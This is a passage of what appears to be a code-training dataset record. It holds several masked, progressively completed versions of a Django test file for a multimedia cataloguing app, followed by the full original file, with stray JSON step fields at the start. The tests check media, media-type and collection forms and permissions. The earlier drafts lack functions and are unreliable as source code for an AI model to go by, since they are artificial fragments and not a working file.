11111111111111111111111111111111
111111',\n'11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111',\n'11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111',\n'11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111',\n'11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111',\n]\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
class MultimediaTest(BaseTestCase):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def test_add_media(self):
"""
Tests create media
"""
self.login_editor()
form_data = minimal_form_data()
response = self.client.post('/multimedia/new', form_data)
self.assertContains(response,
'Por favor verifique os campos obrigatórios')
self.assertContains(response,
'Você precisa inserir pelo menos um descritor de assunto')
self.assertContains(response,
'Você precisa selecionar pelo menos uma área temática')
form_data = complete_form_data()
response = self.client.post('/multimedia/new', form_data, follow=True)
self.assertRedirects(response, '/multimedia/')
self.assertContains(response, 'Foto 1')
self.assertEquals(Media.objects.all()[0].cooperative_center_code,
'BR1.1')
def test_edit_media(self):
"""
Tests edit media
"""
self.login_editor()
create_media_object()
media_test = Media.objects.all()[0]
url = '/multimedia/edit/{0}'.format(media_test.id)
response = self.client.get(url)
self.assertContains(response, media_test.title)
form_data = complete_form_data()
form_data['status'] = '1'
response = self.client.post(url, form_data)
self.assertContains(response,
'é necessário ter pelo menos um descritor')
form_data['status'] = '0'
response = self.client.post(url, form_data, follow=True)
self.assertRedirects(response, '/multimedia/')
self.assertContains(response, 'Foto 1')
def test_delete_media(self):
"""
Tests delete media
"""
self.login_editor()
create_media_object()
response = self.client.get('/multimedia/delete/1')
self.assertContains(response, 'Você tem certeza que deseja apagar?')
response = self.client.post('/multimedia/delete/1')
self.assertTrue(Media.objects.filter(id=1).count() == 0)
self.assertTrue(Descriptor.objects.filter(object_id=1).count() == 0)
self.assertTrue(ResourceThematic.objects.filter(object_id=1).count(
) == 0)
self.assertRedirects(response, '/multimedia/')
def test_list_media_type(self):
"""
Tests list media type
"""
self.login_documentalist()
response = self.client.get('/multimedia/media-types/')
self.assertEqual(response.status_code, 403)
self.client.logout()
self.login_admin()
response = self.client.get('/multimedia/media-types/')
self.assertContains(response, 'Video')
def test_add_media_type(self):
"""
Tests create media type
"""
self.login_documentalist()
response = self.client.get('/multimedia/media-type/new')
self.assertEqual(response.status_code, 403)
self.client.logout()
self.login_admin()
form_data = {'status': '0', 'acronym': 'foto', 'name': 'Foto',
'language': 'pt-br', 'mediatypelocal_set-TOTAL_FORMS': '0',
'mediatypelocal_set-INITIAL_FORMS': '0'}
response = self.client.post('/multimedia/media-type/new', form_data,
follow=True)
self.assertRedirects(response, '/multimedia/media-types')
self.assertContains(response, 'Foto')
def test_list_media_collection(self):
"""
Tests list of media collection
"""
self.login_editor()
MediaCollection.objects.create(name='Coleção 1', description=
'Coleção de teste 1', created_by_id=1, cooperative_center_code=
'BR1.1')
MediaCollection.objects.create(name='Coleção 2', description=
'Coleção de teste 2', created_by_id=2, cooperative_center_code=
'BR1.1')
MediaCollection.objects.create(name='Coleção 3', description=
'Coleção de teste 3', created_by_id=3, cooperative_center_code=
'PY3.8')
response = self.client.get('/multimedia/collections')
self.assertContains(response, 'Coleção 1')
self.assertEquals(response.context['object_list'].count(), 3)
response = self.client.get(
'/multimedia/collections/?filter_created_by_cc=BR1.1')
self.assertEquals(response.context['object_list'].count(), 2)
def test_add_media_collection(self):
"""
Tests add media collection
"""
self.login_editor()
form_data = {'name': 'Coleção nova', 'description':
'Coleção de teste', 'language': 'pt-br',
'mediacollectionlocal_set-TOTAL_FORMS': '0',
'mediacollectionlocal_set-INITIAL_FORMS': '0'}
response = self.client.post('/multimedia/collection/new', form_data,
follow=True)
self.assertRedirects(response, '/multimedia/collections')
self.assertContains(response, 'Coleção nova')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MultimediaTest(BaseTestCase):
<|reserved_special_token_0|>
def setUp(self):
super(MultimediaTest, self).setUp()
media_type = MediaType.objects.create(acronym='video', name='Video')
thematic_area = ThematicArea.objects.create(acronym='LISBR1.1',
name='Teste')
<|reserved_special_token_0|>
def test_add_media(self):
"""
Tests create media
"""
self.login_editor()
form_data = minimal_form_data()
response = self.client.post('/multimedia/new', form_data)
self.assertContains(response,
'Por favor verifique os campos obrigatórios')
self.assertContains(response,
'Você precisa inserir pelo menos um descritor de assunto')
self.assertContains(response,
'Você precisa selecionar pelo menos uma área temática')
form_data = complete_form_data()
response = self.client.post('/multimedia/new', form_data, follow=True)
self.assertRedirects(response, '/multimedia/')
self.assertContains(response, 'Foto 1')
self.assertEquals(Media.objects.all()[0].cooperative_center_code,
'BR1.1')
def test_edit_media(self):
"""
Tests edit media
"""
self.login_editor()
create_media_object()
media_test = Media.objects.all()[0]
url = '/multimedia/edit/{0}'.format(media_test.id)
response = self.client.get(url)
self.assertContains(response, media_test.title)
form_data = complete_form_data()
form_data['status'] = '1'
response = self.client.post(url, form_data)
self.assertContains(response,
'é necessário ter pelo menos um descritor')
form_data['status'] = '0'
response = self.client.post(url, form_data, follow=True)
self.assertRedirects(response, '/multimedia/')
self.assertContains(response, 'Foto 1')
def test_delete_media(self):
"""
Tests delete media
"""
self.login_editor()
create_media_object()
response = self.client.get('/multimedia/delete/1')
self.assertContains(response, 'Você tem certeza que deseja apagar?')
response = self.client.post('/multimedia/delete/1')
self.assertTrue(Media.objects.filter(id=1).count() == 0)
self.assertTrue(Descriptor.objects.filter(object_id=1).count() == 0)
self.assertTrue(ResourceThematic.objects.filter(object_id=1).count(
) == 0)
self.assertRedirects(response, '/multimedia/')
def test_list_media_type(self):
"""
Tests list media type
"""
self.login_documentalist()
response = self.client.get('/multimedia/media-types/')
self.assertEqual(response.status_code, 403)
self.client.logout()
self.login_admin()
response = self.client.get('/multimedia/media-types/')
self.assertContains(response, 'Video')
def test_add_media_type(self):
"""
Tests create media type
"""
self.login_documentalist()
response = self.client.get('/multimedia/media-type/new')
self.assertEqual(response.status_code, 403)
self.client.logout()
self.login_admin()
form_data = {'status': '0', 'acronym': 'foto', 'name': 'Foto',
'language': 'pt-br', 'mediatypelocal_set-TOTAL_FORMS': '0',
'mediatypelocal_set-INITIAL_FORMS': '0'}
response = self.client.post('/multimedia/media-type/new', form_data,
follow=True)
self.assertRedirects(response, '/multimedia/media-types')
self.assertContains(response, 'Foto')
def test_list_media_collection(self):
"""
Tests list of media collection
"""
self.login_editor()
MediaCollection.objects.create(name='Coleção 1', description=
'Coleção de teste 1', created_by_id=1, cooperative_center_code=
'BR1.1')
MediaCollection.objects.create(name='Coleção 2', description=
'Coleção de teste 2', created_by_id=2, cooperative_center_code=
'BR1.1')
MediaCollection.objects.create(name='Coleção 3', description=
'Coleção de teste 3', created_by_id=3, cooperative_center_code=
'PY3.8')
response = self.client.get('/multimedia/collections')
self.assertContains(response, 'Coleção 1')
self.assertEquals(response.context['object_list'].count(), 3)
response = self.client.get(
'/multimedia/collections/?filter_created_by_cc=BR1.1')
self.assertEquals(response.context['object_list'].count(), 2)
def test_add_media_collection(self):
"""
Tests add media collection
"""
self.login_editor()
form_data = {'name': 'Coleção nova', 'description':
'Coleção de teste', 'language': 'pt-br',
'mediacollectionlocal_set-TOTAL_FORMS': '0',
'mediacollectionlocal_set-INITIAL_FORMS': '0'}
response = self.client.post('/multimedia/collection/new', form_data,
follow=True)
self.assertRedirects(response, '/multimedia/collections')
self.assertContains(response, 'Coleção nova')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def minimal_form_data():
"""
Define a minimal fields for submit a media form
"""
form_data = {'status': '0', 'title': 'Foto 1', 'description': 'Foto 1',
'media_type': '1',
'main-descriptor-content_type-object_id-TOTAL_FORMS': '0',
'main-descriptor-content_type-object_id-INITIAL_FORMS': '0',
'main-keyword-content_type-object_id-TOTAL_FORMS': '0',
'main-keyword-content_type-object_id-INITIAL_FORMS': '0',
'main-resourcethematic-content_type-object_id-TOTAL_FORMS': '0',
'main-resourcethematic-content_type-object_id-INITIAL_FORMS': '0'}
return form_data
<|reserved_special_token_0|>
class MultimediaTest(BaseTestCase):
"""
Tests for multimedia app
"""
def setUp(self):
super(MultimediaTest, self).setUp()
media_type = MediaType.objects.create(acronym='video', name='Video')
thematic_area = ThematicArea.objects.create(acronym='LISBR1.1',
name='Teste')
def test_list_media(self):
"""
Test list media
"""
self.login_editor()
create_media_object()
response = self.client.get('/multimedia/')
self.assertContains(response, 'Midia de teste (BR1.1')
self.assertNotContains(response, 'Media de prueba (PY3.1)')
def test_add_media(self):
"""
Tests create media
"""
self.login_editor()
form_data = minimal_form_data()
response = self.client.post('/multimedia/new', form_data)
self.assertContains(response,
'Por favor verifique os campos obrigatórios')
self.assertContains(response,
'Você precisa inserir pelo menos um descritor de assunto')
self.assertContains(response,
'Você precisa selecionar pelo menos uma área temática')
form_data = complete_form_data()
response = self.client.post('/multimedia/new', form_data, follow=True)
self.assertRedirects(response, '/multimedia/')
self.assertContains(response, 'Foto 1')
self.assertEquals(Media.objects.all()[0].cooperative_center_code,
'BR1.1')
def test_edit_media(self):
"""
Tests edit media
"""
self.login_editor()
create_media_object()
media_test = Media.objects.all()[0]
url = '/multimedia/edit/{0}'.format(media_test.id)
response = self.client.get(url)
self.assertContains(response, media_test.title)
form_data = complete_form_data()
form_data['status'] = '1'
response = self.client.post(url, form_data)
self.assertContains(response,
'é necessário ter pelo menos um descritor')
form_data['status'] = '0'
response = self.client.post(url, form_data, follow=True)
self.assertRedirects(response, '/multimedia/')
self.assertContains(response, 'Foto 1')
def test_delete_media(self):
"""
Tests delete media
"""
self.login_editor()
create_media_object()
response = self.client.get('/multimedia/delete/1')
self.assertContains(response, 'Você tem certeza que deseja apagar?')
response = self.client.post('/multimedia/delete/1')
self.assertTrue(Media.objects.filter(id=1).count() == 0)
self.assertTrue(Descriptor.objects.filter(object_id=1).count() == 0)
self.assertTrue(ResourceThematic.objects.filter(object_id=1).count(
) == 0)
self.assertRedirects(response, '/multimedia/')
def test_list_media_type(self):
"""
Tests list media type
"""
self.login_documentalist()
response = self.client.get('/multimedia/media-types/')
self.assertEqual(response.status_code, 403)
self.client.logout()
self.login_admin()
response = self.client.get('/multimedia/media-types/')
self.assertContains(response, 'Video')
def test_add_media_type(self):
"""
Tests create media type
"""
self.login_documentalist()
response = self.client.get('/multimedia/media-type/new')
self.assertEqual(response.status_code, 403)
self.client.logout()
self.login_admin()
form_data = {'status': '0', 'acronym': 'foto', 'name': 'Foto',
'language': 'pt-br', 'mediatypelocal_set-TOTAL_FORMS': '0',
'mediatypelocal_set-INITIAL_FORMS': '0'}
response = self.client.post('/multimedia/media-type/new', form_data,
follow=True)
self.assertRedirects(response, '/multimedia/media-types')
self.assertContains(response, 'Foto')
def test_list_media_collection(self):
"""
Tests list of media collection
"""
self.login_editor()
MediaCollection.objects.create(name='Coleção 1', description=
'Coleção de teste 1', created_by_id=1, cooperative_center_code=
'BR1.1')
MediaCollection.objects.create(name='Coleção 2', description=
'Coleção de teste 2', created_by_id=2, cooperative_center_code=
'BR1.1')
MediaCollection.objects.create(name='Coleção 3', description=
'Coleção de teste 3', created_by_id=3, cooperative_center_code=
'PY3.8')
response = self.client.get('/multimedia/collections')
self.assertContains(response, 'Coleção 1')
self.assertEquals(response.context['object_list'].count(), 3)
response = self.client.get(
'/multimedia/collections/?filter_created_by_cc=BR1.1')
self.assertEquals(response.context['object_list'].count(), 2)
def test_add_media_collection(self):
"""
Tests add media collection
"""
self.login_editor()
form_data = {'name': 'Coleção nova', 'description':
'Coleção de teste', 'language': 'pt-br',
'mediacollectionlocal_set-TOTAL_FORMS': '0',
'mediacollectionlocal_set-INITIAL_FORMS': '0'}
response = self.client.post('/multimedia/collection/new', form_data,
follow=True)
self.assertRedirects(response, '/multimedia/collections')
self.assertContains(response, 'Coleção nova')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def minimal_form_data():
"""
Define a minimal fields for submit a media form
"""
form_data = {'status': '0', 'title': 'Foto 1', 'description': 'Foto 1',
'media_type': '1',
'main-descriptor-content_type-object_id-TOTAL_FORMS': '0',
'main-descriptor-content_type-object_id-INITIAL_FORMS': '0',
'main-keyword-content_type-object_id-TOTAL_FORMS': '0',
'main-keyword-content_type-object_id-INITIAL_FORMS': '0',
'main-resourcethematic-content_type-object_id-TOTAL_FORMS': '0',
'main-resourcethematic-content_type-object_id-INITIAL_FORMS': '0'}
return form_data
def complete_form_data():
"""
Define missing fields for a valid submission of media object
"""
missing_fields = {'link': 'http://www.youtube.com', 'publication_date':
'01/12/2015', 'main-descriptor-content_type-object_id-TOTAL_FORMS':
'1', 'main-descriptor-content_type-object_id-0-id': '',
'main-descriptor-content_type-object_id-0-text': 'malaria',
'main-descriptor-content_type-object_id-0-code': '^d8462',
'main-descriptor-content_type-object_id-0-status': '0',
'main-resourcethematic-content_type-object_id-TOTAL_FORMS': '1',
'main-resourcethematic-content_type-object_id-0-thematic_area': '1',
'main-resourcethematic-content_type-object_id-0-status': '0'}
complete_form_data = minimal_form_data()
complete_form_data.update(missing_fields)
return complete_form_data
def create_media_object():
"""
Create media object for tests
"""
media1 = Media.objects.create(status=0, title='Midia de teste (BR1.1)',
media_type_id=1, link='http://bvsalud.org', created_by_id=1,
cooperative_center_code='BR1.1')
media_ct = ContentType.objects.get_for_model(media1)
descriptor = Descriptor.objects.create(object_id=1, content_type=
media_ct, text='malaria')
thematic = ResourceThematic.objects.create(object_id=1, content_type=
media_ct, thematic_area_id=1)
media2 = Media.objects.create(status=0, title='Media de prueba (PY3.1)',
media_type_id=1, link='http://bvsalud.org', created_by_id=2,
cooperative_center_code='PY3.1')
class MultimediaTest(BaseTestCase):
"""
Tests for multimedia app
"""
def setUp(self):
super(MultimediaTest, self).setUp()
media_type = MediaType.objects.create(acronym='video', name='Video')
thematic_area = ThematicArea.objects.create(acronym='LISBR1.1',
name='Teste')
def test_list_media(self):
"""
Test list media
"""
self.login_editor()
create_media_object()
response = self.client.get('/multimedia/')
self.assertContains(response, 'Midia de teste (BR1.1')
self.assertNotContains(response, 'Media de prueba (PY3.1)')
def test_add_media(self):
"""
Tests create media
"""
self.login_editor()
form_data = minimal_form_data()
response = self.client.post('/multimedia/new', form_data)
self.assertContains(response,
'Por favor verifique os campos obrigatórios')
self.assertContains(response,
'Você precisa inserir pelo menos um descritor de assunto')
self.assertContains(response,
'Você precisa selecionar pelo menos uma área temática')
form_data = complete_form_data()
response = self.client.post('/multimedia/new', form_data, follow=True)
self.assertRedirects(response, '/multimedia/')
self.assertContains(response, 'Foto 1')
self.assertEquals(Media.objects.all()[0].cooperative_center_code,
'BR1.1')
def test_edit_media(self):
"""
Tests edit media
"""
self.login_editor()
create_media_object()
media_test = Media.objects.all()[0]
url = '/multimedia/edit/{0}'.format(media_test.id)
response = self.client.get(url)
self.assertContains(response, media_test.title)
form_data = complete_form_data()
form_data['status'] = '1'
response = self.client.post(url, form_data)
self.assertContains(response,
'é necessário ter pelo menos um descritor')
form_data['status'] = '0'
response = self.client.post(url, form_data, follow=True)
self.assertRedirects(response, '/multimedia/')
self.assertContains(response, 'Foto 1')
def test_delete_media(self):
"""
Tests delete media
"""
self.login_editor()
create_media_object()
response = self.client.get('/multimedia/delete/1')
self.assertContains(response, 'Você tem certeza que deseja apagar?')
response = self.client.post('/multimedia/delete/1')
self.assertTrue(Media.objects.filter(id=1).count() == 0)
self.assertTrue(Descriptor.objects.filter(object_id=1).count() == 0)
self.assertTrue(ResourceThematic.objects.filter(object_id=1).count(
) == 0)
self.assertRedirects(response, '/multimedia/')
def test_list_media_type(self):
"""
Tests list media type
"""
self.login_documentalist()
response = self.client.get('/multimedia/media-types/')
self.assertEqual(response.status_code, 403)
self.client.logout()
self.login_admin()
response = self.client.get('/multimedia/media-types/')
self.assertContains(response, 'Video')
def test_add_media_type(self):
"""
Tests create media type
"""
self.login_documentalist()
response = self.client.get('/multimedia/media-type/new')
self.assertEqual(response.status_code, 403)
self.client.logout()
self.login_admin()
form_data = {'status': '0', 'acronym': 'foto', 'name': 'Foto',
'language': 'pt-br', 'mediatypelocal_set-TOTAL_FORMS': '0',
'mediatypelocal_set-INITIAL_FORMS': '0'}
response = self.client.post('/multimedia/media-type/new', form_data,
follow=True)
self.assertRedirects(response, '/multimedia/media-types')
self.assertContains(response, 'Foto')
def test_list_media_collection(self):
"""
Tests list of media collection
"""
self.login_editor()
MediaCollection.objects.create(name='Coleção 1', description=
'Coleção de teste 1', created_by_id=1, cooperative_center_code=
'BR1.1')
MediaCollection.objects.create(name='Coleção 2', description=
'Coleção de teste 2', created_by_id=2, cooperative_center_code=
'BR1.1')
MediaCollection.objects.create(name='Coleção 3', description=
'Coleção de teste 3', created_by_id=3, cooperative_center_code=
'PY3.8')
response = self.client.get('/multimedia/collections')
self.assertContains(response, 'Coleção 1')
self.assertEquals(response.context['object_list'].count(), 3)
response = self.client.get(
'/multimedia/collections/?filter_created_by_cc=BR1.1')
self.assertEquals(response.context['object_list'].count(), 2)
def test_add_media_collection(self):
"""
Tests add media collection
"""
self.login_editor()
form_data = {'name': 'Coleção nova', 'description':
'Coleção de teste', 'language': 'pt-br',
'mediacollectionlocal_set-TOTAL_FORMS': '0',
'mediacollectionlocal_set-INITIAL_FORMS': '0'}
response = self.client.post('/multimedia/collection/new', form_data,
follow=True)
self.assertRedirects(response, '/multimedia/collections')
self.assertContains(response, 'Coleção nova')
<|reserved_special_token_1|>
# coding: utf-8
from django.test.client import Client
from django.contrib.contenttypes.models import ContentType
from main.models import Descriptor, ResourceThematic, ThematicArea
from utils.tests import BaseTestCase
from models import *
def minimal_form_data():
    """Return the minimum set of form fields needed to submit the media form.

    All inline formsets (descriptor, keyword, thematic) are declared with
    zero forms, which is enough for the form to be parsed but not enough
    to pass validation for an admitted record.
    """
    return {
        'status': '0',
        'title': 'Foto 1',
        'description': 'Foto 1',
        'media_type': '1',

        'main-descriptor-content_type-object_id-TOTAL_FORMS': '0',
        'main-descriptor-content_type-object_id-INITIAL_FORMS': '0',

        'main-keyword-content_type-object_id-TOTAL_FORMS': '0',
        'main-keyword-content_type-object_id-INITIAL_FORMS': '0',

        'main-resourcethematic-content_type-object_id-TOTAL_FORMS': '0',
        'main-resourcethematic-content_type-object_id-INITIAL_FORMS': '0',
    }
def complete_form_data():
    """Return form data for a valid media submission.

    Starts from :func:`minimal_form_data` and adds the link, publication
    date, one descriptor and one thematic area — the fields required for
    the form to validate.
    """
    data = minimal_form_data()
    data.update({
        'link': 'http://www.youtube.com',
        'publication_date': '01/12/2015',

        # one descriptor entry
        'main-descriptor-content_type-object_id-TOTAL_FORMS': '1',
        'main-descriptor-content_type-object_id-0-id': '',
        'main-descriptor-content_type-object_id-0-text': 'malaria',
        'main-descriptor-content_type-object_id-0-code': '^d8462',
        'main-descriptor-content_type-object_id-0-status': '0',

        # one thematic-area entry
        'main-resourcethematic-content_type-object_id-TOTAL_FORMS': '1',
        'main-resourcethematic-content_type-object_id-0-thematic_area': '1',
        'main-resourcethematic-content_type-object_id-0-status': '0',
    })
    return data
def create_media_object():
    '''
    Populate the test database with two Media objects from different
    cooperative centers; the first one also gets a descriptor and a
    thematic area attached via the generic content-type relation.
    '''
    # Media owned by cooperative center BR1.1 (same CC as the editor user)
    media1 = Media.objects.create(status=0, title='Midia de teste (BR1.1)',
                media_type_id=1, link='http://bvsalud.org', created_by_id=1,
                cooperative_center_code='BR1.1')

    media_ct = ContentType.objects.get_for_model(media1)
    # return values are not needed; the rows only have to exist for the tests
    Descriptor.objects.create(object_id=1, content_type=media_ct, text='malaria')
    ResourceThematic.objects.create(object_id=1, content_type=media_ct, thematic_area_id=1)

    # Media from another cooperative center — must NOT appear in BR1.1 listings
    Media.objects.create(status=0, title='Media de prueba (PY3.1)',
                media_type_id=1, link='http://bvsalud.org', created_by_id=2,
                cooperative_center_code='PY3.1')
class MultimediaTest(BaseTestCase):
"""
Tests for multimedia app
"""
def setUp(self):
super(MultimediaTest, self).setUp()
# create auxiliary models used on tests
media_type = MediaType.objects.create(acronym='video', name='Video')
thematic_area = ThematicArea.objects.create(acronym='LISBR1.1', name='Teste')
def test_list_media(self):
"""
Test list media
"""
self.login_editor()
create_media_object()
response = self.client.get('/multimedia/')
self.assertContains(response, "Midia de teste (BR1.1")
# list only medias from user cooperative center (BR1.1)
self.assertNotContains(response, "Media de prueba (PY3.1)")
def test_add_media(self):
"""
Tests create media
"""
self.login_editor()
# invalid submission with missing required fields
form_data = minimal_form_data()
response = self.client.post('/multimedia/new', form_data )
self.assertContains(response,'Por favor verifique os campos obrigatórios')
self.assertContains(response,'Você precisa inserir pelo menos um descritor de assunto')
self.assertContains(response,'Você precisa selecionar pelo menos uma área temática')
# complete form_data with required fields and re-submit form
form_data = complete_form_data()
# test valid submission
# after submit a valid content the view will redirect to /multimedia and list the objects
# follow=True will allow check if the new data is on the list
response = self.client.post('/multimedia/new', form_data, follow=True)
self.assertRedirects(response, '/multimedia/')
self.assertContains(response, "Foto 1")
# check if is set cooperative center code of user (editor = BR1.1)
self.assertEquals(Media.objects.all()[0].cooperative_center_code, "BR1.1")
def test_edit_media(self):
"""
Tests edit media
"""
self.login_editor()
create_media_object()
media_test = Media.objects.all()[0]
url = '/multimedia/edit/{0}'.format(media_test.id)
response = self.client.get(url)
# Test if return form with fields
self.assertContains(response, media_test.title)
# Test changes values and submit
form_data = complete_form_data()
form_data['status'] = '1'
response = self.client.post(url, form_data)
# check for validation of descriptor and thematic area for status = Admitted
self.assertContains(response, "é necessário ter pelo menos um descritor")
# check for normal edition
form_data['status'] = '0'
response = self.client.post(url, form_data, follow=True)
self.assertRedirects(response, '/multimedia/')
self.assertContains(response, "Foto 1")
def test_delete_media(self):
"""
Tests delete media
"""
self.login_editor()
create_media_object()
response = self.client.get('/multimedia/delete/1')
self.assertContains(response, "Você tem certeza que deseja apagar?")
response = self.client.post('/multimedia/delete/1')
self.assertTrue(Media.objects.filter(id=1).count() == 0)
self.assertTrue(Descriptor.objects.filter(object_id=1).count() == 0)
self.assertTrue(ResourceThematic.objects.filter(object_id=1).count() == 0)
self.assertRedirects(response, '/multimedia/')
def test_list_media_type(self):
"""
Tests list media type
"""
# check if documentalist has access to list media-types
self.login_documentalist()
response = self.client.get('/multimedia/media-types/' )
# 403 = unauthorized
self.assertEqual(response.status_code, 403)
self.client.logout()
self.login_admin()
response = self.client.get('/multimedia/media-types/')
self.assertContains(response, "Video")
def test_add_media_type(self):
"""
Tests create media type
"""
# check if documentalist has access to create new media-types
self.login_documentalist()
response = self.client.get('/multimedia/media-type/new' )
# 403 = unauthorized
self.assertEqual(response.status_code, 403)
self.client.logout()
self.login_admin()
form_data = {
'status': '0',
'acronym': 'foto',
'name': 'Foto',
'language' : 'pt-br',
'mediatypelocal_set-TOTAL_FORMS': '0',
'mediatypelocal_set-INITIAL_FORMS': '0',
}
response = self.client.post('/multimedia/media-type/new', form_data, follow=True )
self.assertRedirects(response, '/multimedia/media-types')
self.assertContains(response, "Foto")
def test_list_media_collection(self):
"""
Tests list of media collection
"""
self.login_editor()
# Create a media collection object and test that is present on list
MediaCollection.objects.create(name='Coleção 1',
description='Coleção de teste 1',
created_by_id=1, cooperative_center_code='BR1.1')
MediaCollection.objects.create(name='Coleção 2',
description='Coleção de teste 2',
created_by_id=2, cooperative_center_code='BR1.1')
MediaCollection.objects.create(name='Coleção 3',
description='Coleção de teste 3',
created_by_id=3, cooperative_center_code='PY3.8')
response = self.client.get('/multimedia/collections')
# check if only one collection is returned (restrict by user)
self.assertContains(response, "Coleção 1")
self.assertEquals(response.context['object_list'].count(), 3)
# check if return only colections from cooperative center BR1.1
response = self.client.get('/multimedia/collections/?filter_created_by_cc=BR1.1')
self.assertEquals(response.context['object_list'].count(), 2)
def test_add_media_collection(self):
"""
Tests add media collection
"""
self.login_editor()
form_data = {
'name': 'Coleção nova',
'description': 'Coleção de teste',
'language': 'pt-br',
'mediacollectionlocal_set-TOTAL_FORMS': '0',
'mediacollectionlocal_set-INITIAL_FORMS': '0',
}
response = self.client.post('/multimedia/collection/new', form_data, follow=True )
self.assertRedirects(response, '/multimedia/collections')
self.assertContains(response, "Coleção nova")
|
flexible
|
{
"blob_id": "a253ab5ef80a61c3784862625cde81de4c4ef984",
"index": 2094,
"step-1": "<mask token>\n\n\nclass MultimediaTest(BaseTestCase):\n <mask token>\n <mask token>\n <mask token>\n\n def test_add_media(self):\n \"\"\"\n Tests create media\n \"\"\"\n self.login_editor()\n form_data = minimal_form_data()\n response = self.client.post('/multimedia/new', form_data)\n self.assertContains(response,\n 'Por favor verifique os campos obrigatórios')\n self.assertContains(response,\n 'Você precisa inserir pelo menos um descritor de assunto')\n self.assertContains(response,\n 'Você precisa selecionar pelo menos uma área temática')\n form_data = complete_form_data()\n response = self.client.post('/multimedia/new', form_data, follow=True)\n self.assertRedirects(response, '/multimedia/')\n self.assertContains(response, 'Foto 1')\n self.assertEquals(Media.objects.all()[0].cooperative_center_code,\n 'BR1.1')\n\n def test_edit_media(self):\n \"\"\"\n Tests edit media\n \"\"\"\n self.login_editor()\n create_media_object()\n media_test = Media.objects.all()[0]\n url = '/multimedia/edit/{0}'.format(media_test.id)\n response = self.client.get(url)\n self.assertContains(response, media_test.title)\n form_data = complete_form_data()\n form_data['status'] = '1'\n response = self.client.post(url, form_data)\n self.assertContains(response,\n 'é necessário ter pelo menos um descritor')\n form_data['status'] = '0'\n response = self.client.post(url, form_data, follow=True)\n self.assertRedirects(response, '/multimedia/')\n self.assertContains(response, 'Foto 1')\n\n def test_delete_media(self):\n \"\"\"\n Tests delete media\n \"\"\"\n self.login_editor()\n create_media_object()\n response = self.client.get('/multimedia/delete/1')\n self.assertContains(response, 'Você tem certeza que deseja apagar?')\n response = self.client.post('/multimedia/delete/1')\n self.assertTrue(Media.objects.filter(id=1).count() == 0)\n self.assertTrue(Descriptor.objects.filter(object_id=1).count() == 0)\n self.assertTrue(ResourceThematic.objects.filter(object_id=1).count(\n ) == 0)\n 
self.assertRedirects(response, '/multimedia/')\n\n def test_list_media_type(self):\n \"\"\"\n Tests list media type\n \"\"\"\n self.login_documentalist()\n response = self.client.get('/multimedia/media-types/')\n self.assertEqual(response.status_code, 403)\n self.client.logout()\n self.login_admin()\n response = self.client.get('/multimedia/media-types/')\n self.assertContains(response, 'Video')\n\n def test_add_media_type(self):\n \"\"\"\n Tests create media type\n \"\"\"\n self.login_documentalist()\n response = self.client.get('/multimedia/media-type/new')\n self.assertEqual(response.status_code, 403)\n self.client.logout()\n self.login_admin()\n form_data = {'status': '0', 'acronym': 'foto', 'name': 'Foto',\n 'language': 'pt-br', 'mediatypelocal_set-TOTAL_FORMS': '0',\n 'mediatypelocal_set-INITIAL_FORMS': '0'}\n response = self.client.post('/multimedia/media-type/new', form_data,\n follow=True)\n self.assertRedirects(response, '/multimedia/media-types')\n self.assertContains(response, 'Foto')\n\n def test_list_media_collection(self):\n \"\"\"\n Tests list of media collection\n \"\"\"\n self.login_editor()\n MediaCollection.objects.create(name='Coleção 1', description=\n 'Coleção de teste 1', created_by_id=1, cooperative_center_code=\n 'BR1.1')\n MediaCollection.objects.create(name='Coleção 2', description=\n 'Coleção de teste 2', created_by_id=2, cooperative_center_code=\n 'BR1.1')\n MediaCollection.objects.create(name='Coleção 3', description=\n 'Coleção de teste 3', created_by_id=3, cooperative_center_code=\n 'PY3.8')\n response = self.client.get('/multimedia/collections')\n self.assertContains(response, 'Coleção 1')\n self.assertEquals(response.context['object_list'].count(), 3)\n response = self.client.get(\n '/multimedia/collections/?filter_created_by_cc=BR1.1')\n self.assertEquals(response.context['object_list'].count(), 2)\n\n def test_add_media_collection(self):\n \"\"\"\n Tests add media collection\n \"\"\"\n self.login_editor()\n form_data = {'name': 
'Coleção nova', 'description':\n 'Coleção de teste', 'language': 'pt-br',\n 'mediacollectionlocal_set-TOTAL_FORMS': '0',\n 'mediacollectionlocal_set-INITIAL_FORMS': '0'}\n response = self.client.post('/multimedia/collection/new', form_data,\n follow=True)\n self.assertRedirects(response, '/multimedia/collections')\n self.assertContains(response, 'Coleção nova')\n",
"step-2": "<mask token>\n\n\nclass MultimediaTest(BaseTestCase):\n <mask token>\n\n def setUp(self):\n super(MultimediaTest, self).setUp()\n media_type = MediaType.objects.create(acronym='video', name='Video')\n thematic_area = ThematicArea.objects.create(acronym='LISBR1.1',\n name='Teste')\n <mask token>\n\n def test_add_media(self):\n \"\"\"\n Tests create media\n \"\"\"\n self.login_editor()\n form_data = minimal_form_data()\n response = self.client.post('/multimedia/new', form_data)\n self.assertContains(response,\n 'Por favor verifique os campos obrigatórios')\n self.assertContains(response,\n 'Você precisa inserir pelo menos um descritor de assunto')\n self.assertContains(response,\n 'Você precisa selecionar pelo menos uma área temática')\n form_data = complete_form_data()\n response = self.client.post('/multimedia/new', form_data, follow=True)\n self.assertRedirects(response, '/multimedia/')\n self.assertContains(response, 'Foto 1')\n self.assertEquals(Media.objects.all()[0].cooperative_center_code,\n 'BR1.1')\n\n def test_edit_media(self):\n \"\"\"\n Tests edit media\n \"\"\"\n self.login_editor()\n create_media_object()\n media_test = Media.objects.all()[0]\n url = '/multimedia/edit/{0}'.format(media_test.id)\n response = self.client.get(url)\n self.assertContains(response, media_test.title)\n form_data = complete_form_data()\n form_data['status'] = '1'\n response = self.client.post(url, form_data)\n self.assertContains(response,\n 'é necessário ter pelo menos um descritor')\n form_data['status'] = '0'\n response = self.client.post(url, form_data, follow=True)\n self.assertRedirects(response, '/multimedia/')\n self.assertContains(response, 'Foto 1')\n\n def test_delete_media(self):\n 